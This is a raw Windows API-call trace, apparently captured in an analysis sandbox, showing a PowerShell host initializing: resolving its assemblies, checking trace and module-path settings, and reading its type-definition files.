	[0061.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.784] GetLastError () returned 0x7a
	[0061.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.784] GetLastError () returned 0x7a
	[0061.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.784] GetLastError () returned 0x7a
	[0061.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.784] GetLastError () returned 0x7a
	[0061.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0061.806] GetLastError () returned 0x7a
	[0061.815] SetConsoleCtrlHandler (HandlerRoutine=0x1d2384a, Add=1) returned 1
	[0061.815] GetLastError () returned 0x7a
	[0061.825] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0061.825] GetLastError () returned 0x0
	[0061.825] CoCreateGuid (in: pguid=0xaea98 | out: pguid=0xaea98*(Data1=0xe709ae4d, Data2=0x3731, Data3=0x4790, Data4=([0]=0xa8, [1]=0x4c, [2]=0xf5, [3]=0xee, [4]=0x27, [5]=0xde, [6]=0xf4, [7]=0x6f))) returned 0x0
	[0061.840] WinSqmIsOptedIn () returned 0x0
	[0061.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.841] GetLastError () returned 0xcb
	[0061.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.843] GetLastError () returned 0xcb
	[0061.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.843] GetLastError () returned 0xcb
	[0061.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.844] GetLastError () returned 0xcb
	[0061.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.844] GetLastError () returned 0xcb
	[0061.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.847] GetLastError () returned 0xcb
	[0061.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.847] GetLastError () returned 0xcb
	[0061.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.848] GetLastError () returned 0xcb
	[0061.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.848] GetLastError () returned 0xcb
	[0061.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.853] GetLastError () returned 0xcb
	[0061.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.855] GetLastError () returned 0xcb
	[0061.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.855] GetLastError () returned 0xcb
	[0061.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0061.990] GetLastError () returned 0xcb
	[0061.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0061.991] GetLastError () returned 0xcb
	[0061.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0061.991] GetLastError () returned 0xcb
	[0061.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0061.991] GetLastError () returned 0xcb
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.025] GetLastError () returned 0x3
	[0062.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.026] GetLastError () returned 0x3
	[0062.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.026] GetLastError () returned 0x3
	[0062.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.026] GetLastError () returned 0x3
	[0062.027] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0062.028] GetLastError () returned 0x3
	[0062.028] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x242ad0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0062.028] GetLastError () returned 0x3
	[0062.029] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xae8b0 | out: phkResult=0xae8b0*=0x324) returned 0x0
	[0062.029] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xae8f4, lpData=0x0, lpcbData=0xae8f0*=0x0 | out: lpType=0xae8f4*=0x2, lpData=0x0, lpcbData=0xae8f0*=0x6c) returned 0x0
	[0062.029] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xae8f4, lpData=0x242ad0, lpcbData=0xae8f0*=0x6c | out: lpType=0xae8f4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xae8f0*=0x6c) returned 0x0
	[0062.029] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x242ad0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0062.029] GetLastError () returned 0x3
	[0062.029] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x242ad0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0062.029] GetLastError () returned 0x3
	[0062.030] RegCloseKey (hKey=0x324) returned 0x0
	[0062.030] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x242ad0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0062.030] GetLastError () returned 0x3
	[0062.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xae8b0 | out: phkResult=0xae8b0*=0x324) returned 0x0
	[0062.030] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xae8f4, lpData=0x0, lpcbData=0xae8f0*=0x0 | out: lpType=0xae8f4*=0x0, lpData=0x0, lpcbData=0xae8f0*=0x0) returned 0x2
	[0062.030] RegCloseKey (hKey=0x324) returned 0x0
	[0062.036] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x242ad0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0062.037] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents", nBufferLength=0x105, lpBuffer=0xae418, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents", lpFilePart=0x0) returned 0x1f
	[0062.037] GetLastError () returned 0x3f0
	[0062.038] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0062.038] GetLastError () returned 0x3f0
	[0062.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.046] GetLastError () returned 0xcb
	[0062.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.047] GetLastError () returned 0xcb
	[0062.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.048] GetLastError () returned 0xcb
	[0062.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.048] GetLastError () returned 0xcb
	[0062.049] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae830 | out: phkResult=0xae830*=0x32c) returned 0x0
	[0062.049] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xae898, lpData=0x0, lpcbData=0xae894*=0x0 | out: lpType=0xae898*=0x1, lpData=0x0, lpcbData=0xae894*=0x74) returned 0x0
	[0062.050] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xae878, lpData=0x0, lpcbData=0xae874*=0x0 | out: lpType=0xae878*=0x1, lpData=0x0, lpcbData=0xae874*=0x74) returned 0x0
	[0062.050] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xae878, lpData=0x242ad0, lpcbData=0xae874*=0x74 | out: lpType=0xae878*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xae874*=0x74) returned 0x0
	[0062.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xae3f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0062.050] GetLastError () returned 0xcb
	[0062.050] SetErrorMode (uMode=0x1) returned 0x1
	[0062.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xae878 | out: lpFileInformation=0xae878*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.050] GetLastError () returned 0xcb
	[0062.050] SetErrorMode (uMode=0x1) returned 0x1
	[0062.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0062.052] GetLastError () returned 0xcb
	[0062.052] SetErrorMode (uMode=0x1) returned 0x1
	[0062.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae86c | out: lpFileInformation=0xae86c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0062.052] GetLastError () returned 0xcb
	[0062.052] SetErrorMode (uMode=0x1) returned 0x1
	[0062.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0062.054] GetLastError () returned 0xcb
	[0062.054] SetErrorMode (uMode=0x1) returned 0x1
	[0062.054] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae86c | out: lpFileInformation=0xae86c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0062.054] GetLastError () returned 0xcb
	[0062.054] SetErrorMode (uMode=0x1) returned 0x1
	[0062.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.056] GetLastError () returned 0xcb
	[0062.056] GetACP () returned 0x4e4
	[0062.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae27c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0062.062] GetLastError () returned 0x0
	[0062.062] SetErrorMode (uMode=0x1) returned 0x1
	[0062.064] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0062.064] GetLastError () returned 0x0
	[0062.065] GetFileType (hFile=0x330) returned 0x1
	[0062.065] SetErrorMode (uMode=0x1) returned 0x1
	[0062.065] GetFileType (hFile=0x330) returned 0x1
	[0062.066] ReadFile (in: hFile=0x330, lpBuffer=0x1f73018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1f73018*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.067] GetLastError () returned 0x0
	[0062.067] ReadFile (in: hFile=0x330, lpBuffer=0x1f73018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1f73018*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.067] GetLastError () returned 0x0
	[0062.067] ReadFile (in: hFile=0x330, lpBuffer=0x1f73018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1f73018*, lpNumberOfBytesRead=0xae7e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.067] GetLastError () returned 0x0
	[0062.068] ReadFile (in: hFile=0x330, lpBuffer=0x1f73018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1f73018*, lpNumberOfBytesRead=0xae7e4*=0xcf3, lpOverlapped=0x0) returned 1
	[0062.068] GetLastError () returned 0x0
	[0062.068] ReadFile (in: hFile=0x330, lpBuffer=0x1f724ab, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1f724ab*, lpNumberOfBytesRead=0xae7e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.068] GetLastError () returned 0x0
	[0062.068] ReadFile (in: hFile=0x330, lpBuffer=0x1f73018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae7e4, lpOverlapped=0x0 | out: lpBuffer=0x1f73018*, lpNumberOfBytesRead=0xae7e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.068] GetLastError () returned 0x0
	[0062.069] CloseHandle (hObject=0x330) returned 1
	[0062.069] GetLastError () returned 0x0
	[0062.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0062.070] GetLastError () returned 0x0
	[0062.070] SetErrorMode (uMode=0x1) returned 0x1
	[0062.070] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1f8438c | out: lpFileInformation=0x1f8438c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0062.070] GetLastError () returned 0x0
	[0062.070] SetErrorMode (uMode=0x1) returned 0x1
	[0062.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0062.070] GetLastError () returned 0x0
	[0062.070] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae768 | out: phkResult=0xae768*=0x330) returned 0x0
	[0062.070] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae7b0, lpData=0x0, lpcbData=0xae7ac*=0x0 | out: lpType=0xae7b0*=0x1, lpData=0x0, lpcbData=0xae7ac*=0x56) returned 0x0
	[0062.070] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae7b0, lpData=0x242ad0, lpcbData=0xae7ac*=0x56 | out: lpType=0xae7b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae7ac*=0x56) returned 0x0
	[0062.071] RegCloseKey (hKey=0x330) returned 0x0
	[0062.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0062.071] GetLastError () returned 0x0
	[0062.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0062.071] GetLastError () returned 0x0
